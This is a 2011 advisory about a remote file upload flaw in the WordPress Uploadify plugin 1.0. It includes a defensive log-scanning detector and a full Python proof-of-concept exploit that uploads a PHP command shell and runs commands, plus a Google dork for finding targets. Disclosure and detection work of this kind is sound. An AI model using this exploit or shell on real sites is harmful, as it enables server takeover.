WordPress Uploadify Plugin 1.0 Remote File Upload

Type securityvulns
Reporter Securityvulns
Modified 2011-02-24T00:00:00


GotGeek Labs http://www.gotgeek.com.br/

WordPress Uploadify Plugin 1.0 Remote File Upload

[+] Description

Adds a shortcode to embed the necessary elements to use Uploadify in a page or post which will give your website visitors the ability to upload large files. By default the files will be uploaded to the folder set in your preferences. The shortcode supports most of the Uploadify options, so it can be easily customized to suit your needs.

[+] Information

Title: WordPress Uploadify Plugin 1.0 Remote File Upload
Google Dork: inurl:"/wp-content/plugins/uploadify/"
Advisory: gg-003-2011
Date: 02-18-2011
Last update: 02-21-2011
Link: http://www.gotgeek.com.br/pocs/gg-003-2011.txt
Tested on: CentOS 5.5 + WordPress 3.0.5

[+] Vulnerability

Uploadify Plugin is prone to a vulnerability that lets attackers upload arbitrary files. Successful exploitation allows an attacker to upload PHP code, for example, and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation.

Affected Versions: WordPress Uploadify Plugin 1.0
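The two-step pattern described above leaves a recognisable trace in web server access logs: a multipart POST to process_upload.php that carries its own folder parameter, followed shortly by requests from the same client for a .php file that should not exist in the plugin's includes/ directory. The following detector is an added example written for this page; it is not code from GotGeek Labs or from the plugin. The plugin paths are taken from the advisory; the log lines, client addresses and timestamps are constructed sample data, and the set of files the plugin legitimately serves is an assumption that an operator would extend from a real install.

```python
"""Detect the Uploadify process_upload.php abuse pattern in access logs.

Added example, not part of the GotGeek advisory. Scans Apache/nginx
"combined" format access logs for:
  1. POST to process_upload.php with a client-supplied ``folder`` parameter
     (the advisory's PoC passes folder=./ to drop the file beside the handler);
  2. GET for a .php file in the plugin's includes/ directory that is not one
     of the plugin's own files, escalated when the same client did step 1.
"""
import re
from urllib.parse import urlsplit, parse_qs

PLUGIN_DIR = "/wp-content/plugins/uploadify/includes/"   # from the advisory
UPLOAD_HANDLER = PLUGIN_DIR + "process_upload.php"       # from the advisory
# Assumption: only the handler itself is expected to be requested directly.
# Operators should extend this with the plugin's other real files.
KNOWN_FILES = {"process_upload.php"}

# host ident user [time] "METHOD url proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return (severity, reason) tuples for a single parsed request."""
    findings = []
    path = rec["path"]
    if rec["method"] == "POST" and path.endswith(UPLOAD_HANDLER):
        folder = rec["query"].get("folder", [None])[0]
        if folder is None:
            findings.append(("info", "upload via process_upload.php (default folder)"))
        else:
            # The client choosing the destination is the root of the issue:
            # "./" lands next to the handler, ".." or "/" walk elsewhere.
            sev = "high" if folder.startswith((".", "/")) else "medium"
            findings.append((sev, "upload with client-supplied folder=%r" % folder))
    if rec["method"] == "GET" and PLUGIN_DIR in path and path.endswith(".php"):
        basename = path.rsplit("/", 1)[-1]
        if basename not in KNOWN_FILES:
            sev = "high" if "cmd" in rec["query"] else "medium"
            findings.append((sev, "request for unexpected PHP file %s" % path))
    return findings


def scan(lines):
    """Run the detector over an iterable of log lines and correlate by client IP."""
    findings = []
    uploaders = set()  # clients that already posted with a custom folder
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for sev, reason in classify(rec):
            if "client-supplied folder" in reason:
                uploaders.add(rec["ip"])
            elif (reason.startswith("request for unexpected PHP")
                  and rec["ip"] in uploaders and rec["status"] == 200):
                sev = "critical"
                reason += " served to the client that just uploaded"
            findings.append({"ip": rec["ip"], "time": rec["time"],
                             "severity": sev, "reason": reason})
    return findings


# Constructed sample log: one abusive session and one benign upload session.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Feb/2011:10:01:02 +0000] "GET /wordpress/wp-content/plugins/uploadify/includes/process_upload.php HTTP/1.1" 200 12 "-" "gotgeek"
203.0.113.7 - - [18/Feb/2011:10:01:03 +0000] "POST /wordpress/wp-content/plugins/uploadify/includes/process_upload.php?folder=./ HTTP/1.1" 200 15 "-" "gotgeek"
203.0.113.7 - - [18/Feb/2011:10:01:06 +0000] "GET /wordpress/wp-content/plugins/uploadify/includes/shell.php HTTP/1.1" 200 0 "-" "gotgeek"
203.0.113.7 - - [18/Feb/2011:10:01:06 +0000] "GET /wordpress/wp-content/plugins/uploadify/includes/shell.php?cmd=id HTTP/1.1" 200 54 "-" "gotgeek"
198.51.100.4 - - [18/Feb/2011:10:05:00 +0000] "POST /wordpress/wp-content/plugins/uploadify/includes/process_upload.php HTTP/1.1" 200 15 "http://www.example.com/wordpress/upload/" "Mozilla/5.0"
198.51.100.4 - - [18/Feb/2011:10:05:30 +0000] "GET /wordpress/wp-content/uploads/2011/02/report.pdf HTTP/1.1" 200 40213 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print("%-8s %-15s %s  %s" % (f["severity"], f["ip"], f["time"], f["reason"]))
```

On the sample data the benign session produces a single info-level record, while the abusive session yields one high finding for the POST and two critical findings for the follow-up requests. The severity escalation relies on the GET returning 200, since a 404 for the planted file name means the upload did not land where the client intended.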

[+] Proof of Concept/Exploit


# Python 2 syntax (httplib, print statements), as published in 2011.
import httplib
import socket
import sys, time

plugin = "/wp-content/plugins/uploadify/includes/"
shell = """
<?php system($_GET['cmd']); ?>
"""

def banner():
    print "\n[*] gotgeek labs"
    print "[*] http://gotgeek.com.br\n"

if len(sys.argv) < 4:
    banner()
    print "[?] Usage: " + sys.argv[0] + " <target> <dir> <port>"
    print "[?] Example: uploadify.py www.example.com /wordpress 80\n\n"
    sys.exit(1)

target = sys.argv[1]
dir = sys.argv[2]
port = sys.argv[3]

def checkurl():
    # Confirm the upload handler is reachable before doing anything else.
    try:
        print "[*] Looking for vulnerable file..."
        conn = httplib.HTTPConnection(target + ":" + port)
        conn.request("GET", dir + plugin + "process_upload.php")
        r1 = conn.getresponse()
        if r1.status == 200:
            print "[+] Found!\n"
        else:
            print "[-] NOT Found!\n\n"
            sys.exit(1)
    except socket.error, msg:
        print "[-] Can't connect!\n\n"
        sys.exit(1)

def uploadshell():
    # Hand-built multipart/form-data body; "Filedata" is the field the
    # handler reads, and folder=./ selects the handler's own directory.
    print "[*] Uploading shell..."
    params = ("\r\n"
              "------gg\r\n"
              'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
              "Content-Type: application/octet-stream\r\n"
              "\r\n")
    params += shell + "\r\n"
    params += ("------gg--\r\n"
               "\r\n")
    headers = {'User-Agent': 'gotgeek',
               'Content-Type': 'multipart/form-data; boundary=----gg'}
    conn = httplib.HTTPConnection(target + ":" + port)
    conn.request("POST", dir + plugin + "process_upload.php?folder=./", params, headers)
    time.sleep(3)

def checkshell():
    print "[*] Checking shell.php..."
    conn = httplib.HTTPConnection(target + ":" + port)
    conn.request("GET", dir + plugin + "shell.php")
    r2 = conn.getresponse()
    if r2.status == 200:
        print "[+] Shell Uploaded!\n"
        conn.request("GET", dir + plugin + "shell.php?cmd=id")
        r3 = conn.getresponse()
        id = r3.read()
        print "[+] id: " + id
        print "[+] shell: http://" + target + dir + plugin + "shell.php?cmd=[command]\n\n"
        conn.close()
    else:
        print "[-] NOT Uploaded!\n\n"
        sys.exit(1)

def main():
    banner()
    checkurl()
    uploadshell()
    checkshell()

if __name__ == "__main__":
    main()

[+] References

http://wordpress.org/extend/plugins/uploadify/
http://wordpress.org/extend/plugins/uploadify/stats/

[+] Credits